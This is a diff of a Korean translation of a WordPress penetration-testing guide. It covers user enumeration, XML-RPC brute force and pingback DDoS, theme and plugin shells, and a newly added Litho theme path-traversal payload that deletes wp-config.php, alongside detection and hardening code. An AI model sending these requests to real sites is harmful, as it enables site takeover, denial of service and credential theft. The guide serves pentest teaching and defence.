Translated ['src/network-services-pentesting/pentesting-web/wordpress.md

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -5,7 +5,7 @@
 ## 기본 정보
 
 - **업로드된** 파일은 다음 위치에 있습니다: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **테마 파일은 /wp-content/themes/에서 찾을 수 있습니다.** 따라서 RCE를 얻기 위해 테마의 php를 변경하면 해당 경로를 사용할 가능성이 높습니다. 예를 들어, **테마 twentytwelve**를 사용하면 **404.php** 파일에 **접근**할 수 있습니다: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **테마 파일은 /wp-content/themes/에서 찾을 수 있습니다.** 따라서 RCE를 얻기 위해 테마의 php를 변경하면 해당 경로를 사용할 가능성이 높습니다. 예를 들어: **테마 twentytwelve**를 사용하면 **404.php** 파일에 **접근**할 수 있습니다: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
 - **또 다른 유용한 URL은:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
@@ -15,8 +15,8 @@
 ### **주요 WordPress 파일**
 
 - `index.php`
-- `license.txt`는 설치된 WordPress의 버전과 같은 유용한 정보를 포함합니다.
-- `wp-activate.php`는 새로운 WordPress 사이트를 설정할 때 이메일 활성화 프로세스에 사용됩니다.
+- `license.txt`는 설치된 WordPress 버전과 같은 유용한 정보를 포함합니다.
+- `wp-activate.php`는 새 WordPress 사이트를 설정할 때 이메일 활성화 프로세스에 사용됩니다.
 - 로그인 폴더(숨기기 위해 이름이 변경될 수 있음):
 - `/wp-admin/login.php`
 - `/wp-admin/wp-login.php`
@@ -42,7 +42,7 @@
 
 ## **수동 열거**
 
-### **WordPress 버전 확인**
+### **WordPress 버전 가져오기**
 
 `/license.txt` 또는 `/readme.html` 파일을 찾을 수 있는지 확인합니다.
 
@@ -77,15 +77,15 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
 curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 
 ```
-## Active enumeration
+## 능동적 열거
 
-### Plugins and Themes
+### 플러그인 및 테마
 
-모든 Plugins와 Themes를 찾는 것은 아마 불가능할 것입니다. 모든 것을 발견하기 위해서는 **Plugins와 Themes의 목록을 능동적으로 Brute Force해야 합니다** (다행히도 이러한 목록을 포함하는 자동화 도구가 있습니다).
+모든 플러그인과 테마를 찾는 것은 아마 불가능할 것입니다. 모든 것을 발견하기 위해서는 **플러그인 및 테마 목록을 능동적으로 브루트 포스해야** 합니다(다행히도 이러한 목록을 포함하는 자동화 도구가 있습니다).
 
-### Users
+### 사용자
 
-- **ID Brute:** Brute Forcing 사용자 ID를 통해 WordPress 사이트에서 유효한 사용자를 얻습니다:
+- **ID 브루트:** 사용자 ID를 브루트 포스하여 WordPress 사이트에서 유효한 사용자를 얻습니다:
 ```bash
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
@@ -95,7 +95,7 @@ curl -s -I -X GET http://blog.example.com/?author=1
 ```bash
 curl http://blog.example.com/wp-json/wp/v2/users
 ```
-또 다른 `/wp-json/` 엔드포인트는 사용자에 대한 정보를 드러낼 수 있습니다:
+사용자에 대한 정보를 드러낼 수 있는 또 다른 `/wp-json/` 엔드포인트는:
 ```bash
 curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
@@ -103,11 +103,11 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 
 또한 **/wp-json/wp/v2/pages**는 IP 주소를 유출할 수 있습니다.
 
-- **로그인 사용자 이름 열거**: **`/wp-login.php`**에 로그인할 때 **메시지**는 **사용자 이름이 존재하는지 여부**에 따라 **다릅니다**.
+- **로그인 사용자 이름 열거**: **`/wp-login.php`**에 로그인할 때 **메시지**는 **사용자 이름이 존재하는지 여부에 따라 다릅니다**.
 
 ### XML-RPC
 
-`xml-rpc.php`가 활성화되어 있으면 자격 증명 무차별 대입 공격을 수행하거나 다른 리소스에 대한 DoS 공격을 시작하는 데 사용할 수 있습니다. (예를 들어 [이것을 사용하여](https://github.com/relarizky/wpxploit) 이 프로세스를 자동화할 수 있습니다).
+`xml-rpc.php`가 활성화되어 있으면 자격 증명 무차별 대입 공격을 수행하거나 다른 리소스에 대한 DoS 공격을 시작하는 데 사용할 수 있습니다. (예를 들어 [이것을 사용하여 이 프로세스를 자동화할 수 있습니다](https://github.com/relarizky/wpxploit)).
 
 활성화되어 있는지 확인하려면 _**/xmlrpc.php**_에 접근하고 이 요청을 보내십시오:
 
@@ -134,7 +134,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
 메시지 _"잘못된 사용자 이름 또는 비밀번호"_는 자격 증명이 유효하지 않을 경우 200 코드 응답 내에 나타나야 합니다.
 
-![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
+![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
 
 ![](<../../images/image (721).png>)
 
@@ -168,18 +168,18 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 </params>
 </methodCall>
 ```
-또한 **`system.multicall`**을 사용하여 자격 증명을 브루트 포스하는 **더 빠른 방법**이 있습니다. 이를 통해 동일한 요청에서 여러 자격 증명을 시도할 수 있습니다:
+또한 **`system.multicall`**을 사용하여 자격 증명을 무차별 대입하는 **더 빠른 방법**이 있습니다. 이를 통해 동일한 요청에서 여러 자격 증명을 시도할 수 있습니다:
 
 <figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
 
 **2FA 우회**
 
-이 방법은 프로그램을 위한 것이며 인간을 위한 것이 아니므로 오래된 방법으로 2FA를 지원하지 않습니다. 따라서 유효한 자격 증명이 있지만 주요 출입구가 2FA로 보호되어 있는 경우, **xmlrpc.php를 악용하여 해당 자격 증명으로 2FA를 우회하여 로그인할 수 있을지도 모릅니다**. 콘솔을 통해 수행할 수 있는 모든 작업을 수행할 수는 없지만, Ippsec이 [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)에서 설명한 것처럼 RCE에 도달할 수 있을지도 모릅니다.
+이 방법은 프로그램을 위한 것이며 인간을 위한 것이 아니므로 오래된 방식으로 2FA를 지원하지 않습니다. 따라서 유효한 자격 증명이 있지만 주요 진입점이 2FA로 보호되어 있는 경우, **xmlrpc.php를 악용하여 해당 자격 증명으로 2FA를 우회하여 로그인할 수 있을지도 모릅니다**. 콘솔을 통해 수행할 수 있는 모든 작업을 수행할 수는 없지만, Ippsec이 [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)에서 설명한 것처럼 RCE에 도달할 수 있을지도 모릅니다.
 
 **DDoS 또는 포트 스캐닝**
 
-목록에서 _**pingback.ping**_ 방법을 찾을 수 있다면, Wordpress가 임의의 요청을 어떤 호스트/포트로든 보낼 수 있습니다.\
-이를 사용하여 **수천** 개의 Wordpress **사이트**에 **하나의 위치**에 **접속**하도록 요청할 수 있습니다(따라서 해당 위치에서 **DDoS**가 발생함) 또는 **Wordpress**를 사용하여 일부 내부 **네트워크**를 **스캔**하도록 할 수 있습니다(어떤 포트든 지정할 수 있습니다).
+목록에서 _**pingback.ping**_ 방법을 찾을 수 있다면, Wordpress가 임의의 요청을 어떤 호스트/포트로 보낼 수 있습니다.\
+이를 사용하여 **수천 개**의 Wordpress **사이트**에 **하나의 위치**에 **접근**하도록 요청할 수 있습니다(따라서 해당 위치에서 **DDoS**가 발생함) 또는 **Wordpress**를 사용하여 일부 내부 **네트워크**를 **스캔**하도록 할 수 있습니다(어떤 포트도 지정할 수 있습니다).
 ```html
 <methodCall>
 <methodName>pingback.ping</methodName>
@@ -239,7 +239,7 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
 ```
 ## 비트를 덮어써서 접근하기
 
-실제 공격이라기보다는 호기심입니다. CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man)에서 워드프레스 파일의 비트 하나를 뒤집을 수 있었습니다. 따라서 `/var/www/html/wp-includes/user.php` 파일의 `5389` 위치를 뒤집어 NOT (`!`) 연산을 NOP로 만들 수 있었습니다.
+실제 공격이라기보다는 호기심입니다. CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man)에서 모든 워드프레스 파일의 1비트를 뒤집을 수 있었습니다. 따라서 `/var/www/html/wp-includes/user.php` 파일의 위치 `5389`를 뒤집어 NOT (`!`) 연산을 NOP로 만들 수 있었습니다.
 ```php
 if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
 return new WP_Error(
@@ -254,7 +254,7 @@ php 셸을 위한 내용을 변경합니다:
 
 ![](<../../images/image (384).png>)
 
-업데이트된 페이지에 어떻게 접근할 수 있는지 인터넷에서 검색합니다. 이 경우 여기로 접근해야 합니다: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+업데이트된 페이지에 접근하는 방법을 인터넷에서 검색하세요. 이 경우 여기로 접근해야 합니다: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
 ### MSF
 
@@ -285,29 +285,29 @@ to get a session.
 
 ![](<../../images/image (70).png>)
 
-아마도 이것은 겉으로 보기에는 아무것도 하지 않을 것입니다. 하지만 미디어로 가면 업로드된 셸을 볼 수 있습니다:
+아마도 이것은 겉으로는 아무것도 하지 않을 것입니다. 하지만 미디어로 가면 업로드된 쉘을 볼 수 있습니다:
 
 ![](<../../images/image (462).png>)
 
-접속하면 리버스 셸을 실행할 URL을 볼 수 있습니다:
+접속하면 리버스 쉘을 실행할 URL을 볼 수 있습니다:
 
 ![](<../../images/image (1006).png>)
 
-### 악성 플러그인 업로드 및 활성화
+### Uploading and activating malicious plugin
 
-이 방법은 취약한 것으로 알려진 악성 플러그인을 설치하여 웹 셸을 얻는 것을 포함합니다. 이 과정은 다음과 같이 WordPress 대시보드를 통해 수행됩니다:
+이 방법은 취약한 것으로 알려진 악성 플러그인을 설치하여 웹 쉘을 얻는 것을 포함합니다. 이 과정은 다음과 같이 WordPress 대시보드를 통해 수행됩니다:
 
-1. **플러그인 획득**: 플러그인은 Exploit DB와 같은 출처에서 얻습니다 [**여기**](https://www.exploit-db.com/exploits/36374).
-2. **플러그인 설치**:
-- WordPress 대시보드로 이동한 후 `대시보드 > 플러그인 > 플러그인 업로드`로 이동합니다.
+1. **Plugin Acquisition**: 플러그인은 [**여기**](https://www.exploit-db.com/exploits/36374)와 같은 출처에서 얻습니다.
+2. **Plugin Installation**:
+- WordPress 대시보드로 이동한 후 `대시보드 > 플러그인 > 플러그인 업로드`로 갑니다.
 - 다운로드한 플러그인의 zip 파일을 업로드합니다.
-3. **플러그인 활성화**: 플러그인이 성공적으로 설치되면 대시보드를 통해 활성화해야 합니다.
-4. **악용**:
+3. **Plugin Activation**: 플러그인이 성공적으로 설치되면 대시보드를 통해 활성화해야 합니다.
+4. **Exploitation**:
 - "reflex-gallery" 플러그인이 설치되고 활성화되면, 취약한 것으로 알려져 있어 악용할 수 있습니다.
 - Metasploit 프레임워크는 이 취약점에 대한 익스플로잇을 제공합니다. 적절한 모듈을 로드하고 특정 명령을 실행함으로써 meterpreter 세션을 설정하여 사이트에 대한 무단 접근을 허용합니다.
 - 이는 WordPress 사이트를 악용하는 많은 방법 중 하나일 뿐입니다.
 
-내용에는 플러그인을 설치하고 활성화하는 WordPress 대시보드의 단계를 보여주는 시각적 도구가 포함되어 있습니다. 그러나 이러한 방식으로 취약점을 악용하는 것은 적절한 권한 없이 불법이며 비윤리적이라는 점에 유의해야 합니다. 이 정보는 책임감 있게 사용해야 하며, 명시적인 허가가 있는 침투 테스트와 같은 법적 맥락에서만 사용해야 합니다.
+내용에는 플러그인을 설치하고 활성화하는 WordPress 대시보드의 단계를 보여주는 시각적 도구가 포함되어 있습니다. 그러나 이러한 방식으로 취약점을 악용하는 것은 적절한 권한 없이 불법이며 비윤리적이라는 점에 유의해야 합니다. 이 정보는 책임감 있게 사용해야 하며, 명시적인 허가가 있는 침투 테스트와 같은 합법적인 맥락에서만 사용해야 합니다.
 
 **자세한 단계는 다음을 확인하세요:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
 
@@ -315,7 +315,7 @@ to get a session.
 
 - [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_는 **Cross-Site Scripting (XSS)** 취약점을 **Remote Code Execution (RCE)** 또는 WordPress의 다른 중요한 취약점으로 상승시키기 위해 설계된 스크립트입니다. 자세한 내용은 [**이 게시물**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)을 확인하세요. **Wordpress Versions 6.X.X, 5.X.X 및 4.X.X를 지원하며 다음을 허용합니다:**
 - _**Privilege Escalation:**_ WordPress에 사용자를 생성합니다.
-- _**(RCE) Custom Plugin (backdoor) Upload:**_ WordPress에 사용자 정의 플러그인(백도어)을 업로드합니다.
+- _**(RCE) Custom Plugin (backdoor) Upload:**_ 사용자 정의 플러그인(백도어)을 WordPress에 업로드합니다.
 - _**(RCE) Built-In Plugin Edit:**_ WordPress의 내장 플러그인을 편집합니다.
 - _**(RCE) Built-In Theme Edit:**_ WordPress의 내장 테마를 편집합니다.
 - _**(Custom) Custom Exploits:**_ 서드파티 WordPress 플러그인/테마에 대한 사용자 정의 익스플로잇.
@@ -334,21 +334,21 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
 
 ### Attack Surface
 
-워드프레스 플러그인이 기능을 어떻게 노출할 수 있는지를 아는 것은 그 기능에서 취약점을 찾는 데 핵심입니다. 플러그인이 기능을 어떻게 노출할 수 있는지에 대한 내용은 다음의 글머리 기호와 [**이 블로그 포스트**](https://nowotarski.info/wordpress-nonce-authorization/)의 취약한 플러그인 예시에서 확인할 수 있습니다.
+워드프레스 플러그인이 기능을 어떻게 노출할 수 있는지를 아는 것은 그 기능에서 취약점을 찾는 데 중요합니다. 플러그인이 기능을 어떻게 노출할 수 있는지에 대한 내용은 다음의 글머리 기호와 [**이 블로그 포스트**](https://nowotarski.info/wordpress-nonce-authorization/)의 취약한 플러그인 예시에서 확인할 수 있습니다.
 
 - **`wp_ajax`**
 
-플러그인이 기능을 사용자에게 노출할 수 있는 방법 중 하나는 AJAX 핸들러를 통해서입니다. 이러한 핸들러는 논리, 권한 부여 또는 인증 버그를 포함할 수 있습니다. 게다가, 이러한 기능은 워드프레스 nonce의 존재에 기반하여 인증 및 권한 부여를 수행하는 경우가 잦습니다. 이 nonce는 **워드프레스 인스턴스에 인증된 모든 사용자가 가질 수 있습니다** (역할에 관계없이).
+플러그인이 사용자를 위해 기능을 노출할 수 있는 방법 중 하나는 AJAX 핸들러를 통해서입니다. 이러한 핸들러는 논리, 권한 부여 또는 인증 버그를 포함할 수 있습니다. 게다가, 이러한 기능은 워드프레스 nonce의 존재에 기반하여 인증 및 권한 부여를 수행하는 경우가 잦습니다. **워드프레스 인스턴스에 인증된 모든 사용자가 이를 가질 수 있습니다** (역할에 관계없이).
 
-이들은 플러그인에서 기능을 노출하는 데 사용할 수 있는 함수입니다:
+다음은 플러그인에서 기능을 노출하는 데 사용할 수 있는 함수들입니다:
 ```php
 add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
 add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
 ```
-**`nopriv`의 사용은 엔드포인트를 모든 사용자(인증되지 않은 사용자 포함)가 접근할 수 있게 만듭니다.**
+**`nopriv`의 사용은 엔드포인트를 모든 사용자(인증되지 않은 사용자 포함)가 접근할 수 있도록 만듭니다.**
 
 > [!CAUTION]
-> 게다가, 만약 함수가 `wp_verify_nonce` 함수를 사용하여 사용자의 권한을 확인하고 있다면, 이 함수는 사용자가 로그인했는지만 확인하고, 일반적으로 사용자의 역할을 확인하지 않습니다. 따라서 권한이 낮은 사용자가 권한이 높은 작업에 접근할 수 있습니다.
+> 또한, 만약 함수가 `wp_verify_nonce` 함수를 사용하여 사용자의 권한을 확인하고 있다면, 이 함수는 사용자가 로그인했는지만 확인하고, 일반적으로 사용자의 역할을 확인하지 않습니다. 따라서 권한이 낮은 사용자가 권한이 높은 작업에 접근할 수 있습니다.
 
 - **REST API**
 
@@ -364,15 +364,91 @@ $this->namespace, '/get/', array(
 ```
 `permission_callback`는 주어진 사용자가 API 메서드를 호출할 수 있는 권한이 있는지 확인하는 함수에 대한 콜백입니다.
 
-**내장된 `__return_true` 함수를 사용하면 사용자 권한 검사를 단순히 건너뜁니다.**
+**내장된 `__return_true` 함수가 사용되면, 사용자 권한 확인을 단순히 건너뜁니다.**
 
-- **PHP 파일에 직접 접근**
+- **php 파일에 직접 접근**
 
-물론, WordPress는 PHP를 사용하며 플러그인 내부의 파일은 웹에서 직접 접근할 수 있습니다. 따라서 플러그인이 파일에 접근하는 것만으로도 트리거되는 취약한 기능을 노출하는 경우, 모든 사용자가 이를 악용할 수 있습니다.
+물론, Wordpress는 PHP를 사용하며 플러그인 내부의 파일은 웹에서 직접 접근할 수 있습니다. 따라서 플러그인이 파일에 접근하는 것만으로도 트리거되는 취약한 기능을 노출하는 경우, 모든 사용자가 이를 악용할 수 있습니다.
+
+### wp_ajax_nopriv를 통한 인증되지 않은 임의 파일 삭제 (Litho 테마 <= 3.0)
+
+WordPress 테마와 플러그인은 종종 `wp_ajax_` 및 `wp_ajax_nopriv_` 훅을 통해 AJAX 핸들러를 노출합니다. **_nopriv_** 변형이 사용될 때 **콜백은 인증되지 않은 방문자가 접근할 수 있게 됩니다**, 따라서 모든 민감한 작업은 추가적으로 다음을 구현해야 합니다:
+
+1. **권한 확인** (예: `current_user_can()` 또는 최소한 `is_user_logged_in()`), 및
+2. **CSRF nonce**가 `check_ajax_referer()` / `wp_verify_nonce()`로 검증되며, 및
+3. **엄격한 입력 정화 / 검증**.
+
+Litho 다목적 테마 (< 3.1)는 *Remove Font Family* 기능에서 이 3가지 제어를 잊어버리고 다음 코드를 포함하여 배포하게 되었습니다 (단순화됨):
+```php
+function litho_remove_font_family_action_data() {
+if ( empty( $_POST['fontfamily'] ) ) {
+return;
+}
+$fontfamily = str_replace( ' ', '-', $_POST['fontfamily'] );
+$upload_dir = wp_upload_dir();
+$srcdir  = untrailingslashit( wp_normalize_path( $upload_dir['basedir'] ) ) . '/litho-fonts/' . $fontfamily;
+$filesystem = Litho_filesystem::init_filesystem();
+
+if ( file_exists( $srcdir ) ) {
+$filesystem->delete( $srcdir, FS_CHMOD_DIR );
+}
+die();
+}
+add_action( 'wp_ajax_litho_remove_font_family_action_data',        'litho_remove_font_family_action_data' );
+add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
+```
+이 스니펫에서 발생하는 문제:
+
+* **인증되지 않은 접근** – `wp_ajax_nopriv_` 훅이 등록되어 있습니다.
+* **논스 / 권한 확인 없음** – 모든 방문자가 엔드포인트에 접근할 수 있습니다.
+* **경로 정제 없음** – 사용자 제어 `fontfamily` 문자열이 필터링 없이 파일 시스템 경로에 연결되어, 고전적인 `../../` 탐색이 가능합니다.
+
+#### 악용
+
+공격자는 단일 HTTP POST 요청을 보내어 **업로드 기본 디렉토리**(일반적으로 `<wp-root>/wp-content/uploads/`) 아래의 모든 파일이나 디렉토리를 삭제할 수 있습니다:
+```bash
+curl -X POST https://victim.com/wp-admin/admin-ajax.php \
+-d 'action=litho_remove_font_family_action_data' \
+-d 'fontfamily=../../../../wp-config.php'
+```
+`wp-config.php` 파일이 *uploads* 외부에 위치하기 때문에 기본 설치에서는 네 개의 `../` 시퀀스만으로 충분합니다. `wp-config.php`를 삭제하면 다음 방문 시 WordPress가 *설치 마법사*로 강제 전환되어 전체 사이트를 장악할 수 있습니다(공격자는 단순히 새로운 DB 구성을 제공하고 관리자 사용자를 생성합니다).
+
+다른 영향력 있는 타겟으로는 보안 플러그인을 무력화하기 위한 플러그인/테마 `.php` 파일이나 `.htaccess` 규칙이 있습니다.
+
+#### 탐지 체크리스트
+
+* 파일 시스템 헬퍼(`copy()`, `unlink()`, `$wp_filesystem->delete()` 등)를 호출하는 모든 `add_action( 'wp_ajax_nopriv_...')` 콜백.
+* 경로에 비위생적인 사용자 입력의 연결( `$_POST`, `$_GET`, `$_REQUEST`를 찾아보세요).
+* `check_ajax_referer()` 및 `current_user_can()`/`is_user_logged_in()`의 부재.
+
+#### 강화
+```php
+function secure_remove_font_family() {
+if ( ! is_user_logged_in() ) {
+wp_send_json_error( 'forbidden', 403 );
+}
+check_ajax_referer( 'litho_fonts_nonce' );
+
+$fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
+$srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily;
+
+if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) {
+wp_send_json_error( 'invalid path', 400 );
+}
+// … proceed …
+}
+add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
+//  🔒  NO wp_ajax_nopriv_ registration
+```
+> [!TIP]
+> **항상** 디스크에서의 모든 쓰기/삭제 작업을 특권으로 취급하고 두 번 확인하십시오:
+> • 인증  • 권한 부여  • 논스  • 입력 정화  • 경로 포함 (예: `realpath()`와 `str_starts_with()` 사용).
+
+---
 
 ## WordPress 보호
 
-### 정기적인 업데이트
+### 정기 업데이트
 
 WordPress, 플러그인 및 테마가 최신 상태인지 확인하십시오. 또한 wp-config.php에서 자동 업데이트가 활성화되어 있는지 확인하십시오:
 ```bash
@@ -392,8 +468,12 @@ add_filter( 'auto_update_theme', '__return_true' );
 
 - 기본 **admin** 사용자 제거
 - **강력한 비밀번호**와 **2FA** 사용
-- 주기적으로 **사용자 권한** 검토
+- 주기적으로 사용자 **권한** 검토
 - 무차별 대입 공격을 방지하기 위해 **로그인 시도 제한**
 - **`wp-admin.php`** 파일 이름 변경 및 내부 또는 특정 IP 주소에서만 접근 허용.
 
+## 참조
+
+- [Litho 테마의 인증되지 않은 임의 파일 삭제 취약점](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
+
 {{#include ../../banners/hacktricks-training.md}}